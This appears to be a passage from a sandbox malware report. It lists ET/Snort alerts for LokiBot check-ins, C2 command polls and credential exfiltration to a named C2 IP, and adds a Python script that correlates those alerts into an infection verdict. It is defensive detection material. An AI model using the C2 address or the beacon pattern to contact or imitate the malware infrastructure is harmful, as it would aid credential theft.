01/28/22-23:37:21.668707 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49774 | 185.185.69.76 | 192.168.2.6
01/28/22-23:37:22.809911 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49775 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:22.809911 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49775 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:22.809911 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49775 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:22.809911 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49775 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:24.212196 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49775 | 185.185.69.76 | 192.168.2.6
01/28/22-23:37:25.398463 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49776 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:25.398463 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49776 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:25.398463 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49776 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:25.398463 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49776 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:26.758080 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49776 | 185.185.69.76 | 192.168.2.6
01/28/22-23:37:29.263306 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49779 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:29.263306 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49779 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:29.263306 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49779 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:29.263306 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49779 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:30.738582 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49779 | 185.185.69.76 | 192.168.2.6
01/28/22-23:37:33.962521 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49780 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:33.962521 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49780 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:33.962521 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49780 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:33.962521 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49780 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:35.373624 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49780 | 185.185.69.76 | 192.168.2.6
01/28/22-23:37:36.594728 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49782 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:36.594728 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49782 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:36.594728 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49782 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:36.594728 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49782 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:37.913035 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49782 | 185.185.69.76 | 192.168.2.6
01/28/22-23:37:39.408767 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49783 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:39.408767 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49783 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:39.408767 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49783 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:39.408767 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49783 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:40.689153 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49783 | 185.185.69.76 | 192.168.2.6
01/28/22-23:37:41.973820 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49784 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:41.973820 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49784 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:41.973820 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49784 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:41.973820 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49784 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:43.403239 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49784 | 185.185.69.76 | 192.168.2.6
01/28/22-23:37:44.786353 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49787 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:44.786353 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49787 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:44.786353 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49787 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:44.786353 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49787 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:46.235905 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49787 | 185.185.69.76 | 192.168.2.6
01/28/22-23:37:51.111628 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49793 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:51.111628 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49793 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:51.111628 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49793 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:51.111628 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49793 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:52.495630 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49793 | 185.185.69.76 | 192.168.2.6
01/28/22-23:37:55.089534 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49795 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:55.089534 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49795 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:55.089534 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49795 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:55.089534 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49795 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:56.498845 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49795 | 185.185.69.76 | 192.168.2.6
01/28/22-23:37:59.460407 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49797 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:59.460407 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49797 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:59.460407 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49797 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:59.460407 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49797 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:00.863838 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49797 | 185.185.69.76 | 192.168.2.6
01/28/22-23:38:02.169112 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49802 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:02.169112 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49802 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:02.169112 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49802 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:02.169112 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49802 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:03.551551 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49802 | 185.185.69.76 | 192.168.2.6
01/28/22-23:38:06.424436 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49818 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:06.424436 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49818 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:06.424436 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49818 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:06.424436 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49818 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:07.849755 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49818 | 185.185.69.76 | 192.168.2.6
01/28/22-23:38:10.077239 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49830 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:10.077239 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49830 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:10.077239 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49830 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:10.077239 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49830 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:11.381909 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49830 | 185.185.69.76 | 192.168.2.6
01/28/22-23:38:12.712442 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49840 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:12.712442 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49840 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:12.712442 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49840 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:12.712442 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49840 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:14.111048 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49840 | 185.185.69.76 | 192.168.2.6
01/28/22-23:38:17.281043 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49841 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:17.281043 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49841 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:17.281043 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49841 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:17.281043 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49841 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:18.654023 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49841 | 185.185.69.76 | 192.168.2.6
01/28/22-23:38:20.171529 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49842 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:20.171529 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49842 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:20.171529 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49842 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:20.171529 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49842 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:21.628648 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49842 | 185.185.69.76 | 192.168.2.6
01/28/22-23:38:23.240806 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49845 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:23.240806 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49845 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:23.240806 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49845 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:23.240806 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49845 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:24.676434 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49845 | 185.185.69.76 | 192.168.2.6
01/28/22-23:38:27.482883 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49850 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:27.482883 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49850 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:27.482883 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49850 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:27.482883 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49850 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:28.925374 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49850 | 185.185.69.76 | 192.168.2.6
01/28/22-23:38:31.054520 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49851 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:31.054520 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49851 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:31.054520 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49851 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:31.054520 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49851 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:32.352724 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49851 | 185.185.69.76 | 192.168.2.6
01/28/22-23:38:33.510655 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49852 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:33.510655 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49852 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:33.510655 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49852 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:33.510655 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49852 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:35.007775 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49852 | 185.185.69.76 | 192.168.2.6
01/28/22-23:38:37.134931 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49854 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:37.134931 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49854 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:37.134931 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49854 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:37.134931 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49854 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:38.454947 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49854 | 185.185.69.76 | 192.168.2.6
01/28/22-23:38:40.133791 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49855 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:40.133791 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49855 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:40.133791 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49855 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:40.133791 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49855 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:41.392922 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49855 | 185.185.69.76 | 192.168.2.6
01/28/22-23:38:42.445022 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49862 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:42.445022 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49862 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:42.445022 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49862 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:42.445022 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49862 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:43.841937 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49862 | 185.185.69.76 | 192.168.2.6
01/28/22-23:38:46.720808 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49870 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:46.720808 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49870 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:46.720808 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49870 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:46.720808 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49870 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:48.177226 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49870 | 185.185.69.76 | 192.168.2.6
01/28/22-23:38:49.452650 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49881 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:49.452650 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49881 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:49.452650 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49881 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:49.452650 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49881 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:50.674109 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49881 | 185.185.69.76 | 192.168.2.6
01/28/22-23:38:52.315956 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49882 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:52.315956 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49882 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:52.315956 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49882 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:52.315956 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49882 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:53.689454 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49882 | 185.185.69.76 | 192.168.2.6
01/28/22-23:38:54.799526 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49883 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:54.799526 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49883 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:54.799526 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49883 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:54.799526 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49883 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:56.145381 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49883 | 185.185.69.76 | 192.168.2.6
01/28/22-23:38:57.255335 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49885 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:57.255335 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49885 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:57.255335 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49885 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:57.255335 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49885 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:38:58.636997 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49885 | 185.185.69.76 | 192.168.2.6
01/28/22-23:39:00.138023 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49886 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:39:00.138023 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49886 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:39:00.138023 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49886 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:39:00.138023 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49886 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:39:01.668779 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49886 | 185.185.69.76 | 192.168.2.6
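The alerts above fire four at a time on every client request, and the only thing that links a check-in to the server's "Fake 404 Response" is the client's ephemeral port. The Python below is an added example for reading such a table in a SOC pipeline; it is not part of the Joe Sandbox report and not code from the sample. It folds alert rows into one record per TCP connection, measures the command-polling cadence, and derives a per-host verdict. Its ALERTS block is a constructed subset of the rows in the table above, written pipe-separated in the table's column order; the verdict thresholds (at least three server-acknowledged polls, median interval under 60 s) are assumptions chosen for illustration.

```python
"""Correlate ET/Snort LokiBot alerts into per-connection events and a host verdict.

Added example, not part of the Joe Sandbox report. ALERTS is a constructed
subset of this report's Snort table: timestamp, protocol, SID, message,
source port, destination port, source IP, destination IP.
"""
import statistics
from collections import defaultdict
from datetime import datetime

ALERTS = """\
01/28/22-23:37:07.260369|TCP|2024312|ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1|49769|80|192.168.2.6|185.185.69.76
01/28/22-23:37:07.260369|TCP|2021641|ET TROJAN LokiBot User-Agent (Charon/Inferno)|49769|80|192.168.2.6|185.185.69.76
01/28/22-23:37:07.260369|TCP|2025381|ET TROJAN LokiBot Checkin|49769|80|192.168.2.6|185.185.69.76
01/28/22-23:37:07.260369|TCP|2024317|ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2|49769|80|192.168.2.6|185.185.69.76
01/28/22-23:37:10.277966|TCP|2024312|ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1|49770|80|192.168.2.6|185.185.69.76
01/28/22-23:37:10.277966|TCP|2025381|ET TROJAN LokiBot Checkin|49770|80|192.168.2.6|185.185.69.76
01/28/22-23:37:14.709347|TCP|2024313|ET TROJAN LokiBot Request for C2 Commands Detected M1|49771|80|192.168.2.6|185.185.69.76
01/28/22-23:37:14.709347|TCP|2025381|ET TROJAN LokiBot Checkin|49771|80|192.168.2.6|185.185.69.76
01/28/22-23:37:16.117797|TCP|2025483|ET TROJAN LokiBot Fake 404 Response|80|49771|185.185.69.76|192.168.2.6
01/28/22-23:37:17.458669|TCP|2024313|ET TROJAN LokiBot Request for C2 Commands Detected M1|49773|80|192.168.2.6|185.185.69.76
01/28/22-23:37:17.458669|TCP|2025381|ET TROJAN LokiBot Checkin|49773|80|192.168.2.6|185.185.69.76
01/28/22-23:37:18.890584|TCP|2025483|ET TROJAN LokiBot Fake 404 Response|80|49773|185.185.69.76|192.168.2.6
01/28/22-23:37:20.261992|TCP|2024313|ET TROJAN LokiBot Request for C2 Commands Detected M1|49774|80|192.168.2.6|185.185.69.76
01/28/22-23:37:20.261992|TCP|2025381|ET TROJAN LokiBot Checkin|49774|80|192.168.2.6|185.185.69.76
01/28/22-23:37:21.668707|TCP|2025483|ET TROJAN LokiBot Fake 404 Response|80|49774|185.185.69.76|192.168.2.6
"""

SID_CHECKIN = 2025381             # ET TROJAN LokiBot Checkin
SID_FAKE_404 = 2025483            # ET TROJAN LokiBot Fake 404 Response (server -> client)
SID_EXFIL = {2024312, 2024317}    # Credential Data Exfiltration M1 / M2
SID_C2_POLL = {2024313, 2024318}  # Request for C2 Commands M1 / M2


def parse_alerts(text):
    rows = []
    for line in filter(None, text.splitlines()):
        ts, proto, sid, msg, sport, dport, sip, dip = line.split("|")
        rows.append({"ts": datetime.strptime(ts, "%m/%d/%y-%H:%M:%S.%f"),
                     "proto": proto, "sid": int(sid), "msg": msg,
                     "sport": int(sport), "dport": int(dport), "sip": sip, "dip": dip})
    return rows


def flow_key(r):
    """(client_ip, client_port, server_ip, server_port). Heuristic: the endpoint
    with the lower port number is the server, so a request and its reply share a key."""
    if r["sport"] < r["dport"]:
        return (r["dip"], r["dport"], r["sip"], r["sport"])
    return (r["sip"], r["sport"], r["dip"], r["dport"])


def correlate(rows):
    """Fold alerts into one record per TCP connection."""
    flows = {}
    for r in rows:
        f = flows.setdefault(flow_key(r), {"first": r["ts"], "sids": set(), "server_alerted": False})
        f["first"] = min(f["first"], r["ts"])
        f["sids"].add(r["sid"])
        if r["sid"] == SID_FAKE_404:
            f["server_alerted"] = True      # the C2 answered this exact connection
    return flows


def classify(f):
    if f["sids"] & SID_EXFIL:
        return "exfil"
    if f["sids"] & SID_C2_POLL:
        return "c2-poll"
    if SID_CHECKIN in f["sids"]:
        return "checkin"
    return "other"


def beacon_intervals(flows):
    """Seconds between consecutive command polls, taken from each connection's first alert."""
    starts = sorted(f["first"] for f in flows if classify(f) == "c2-poll")
    return [round((b - a).total_seconds(), 6) for a, b in zip(starts, starts[1:])]


def host_verdict(flows, min_polls=3, max_median_interval=60.0):
    """Per (client, server, server_port): infected if credential data left the host,
    or if the host polls for commands at a short regular interval and the server
    answers every poll with the fake 404 that SID 2025483 flags. Thresholds are assumptions."""
    by_pair = defaultdict(list)
    for (cip, _cport, sip, sport), f in flows.items():
        by_pair[(cip, sip, sport)].append(f)
    verdicts = {}
    for pair, fl in by_pair.items():
        polls = [f for f in fl if classify(f) == "c2-poll"]
        acked = sum(1 for f in polls if f["server_alerted"])
        intervals = beacon_intervals(polls)
        median = statistics.median(intervals) if intervals else None
        beaconing = (len(polls) >= min_polls and acked == len(polls)
                     and median is not None and median <= max_median_interval)
        n_exfil = sum(1 for f in fl if classify(f) == "exfil")
        verdicts[pair] = {"exfil_flows": n_exfil, "poll_flows": len(polls),
                          "polls_acked": acked, "median_interval_s": median,
                          "infected": n_exfil > 0 or beaconing}
    return verdicts


if __name__ == "__main__":
    for pair, v in host_verdict(correlate(parse_alerts(ALERTS))).items():
        print(pair, v)
```

On the rows above this yields two exfiltration connections (49769, 49770) and three command polls (49771, 49773, 49774), each acknowledged by the server, about 2.75 s apart; the verdict is "infected". If the same polling is seen without the server's fake-404 replies and without an exfiltration alert, the verdict stays negative, which is the point of keying on the connection rather than counting alerts: a scanner or a replayed request that the C2 never answers does not look like a live implant.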
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 28, 2022 23:37:07.201168060 CET | 49769 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:07.257311106 CET | 80 | 49769 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:07.257415056 CET | 49769 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:07.260369062 CET | 49769 | 80 | 192.168.2.6 | 185.185.69.76
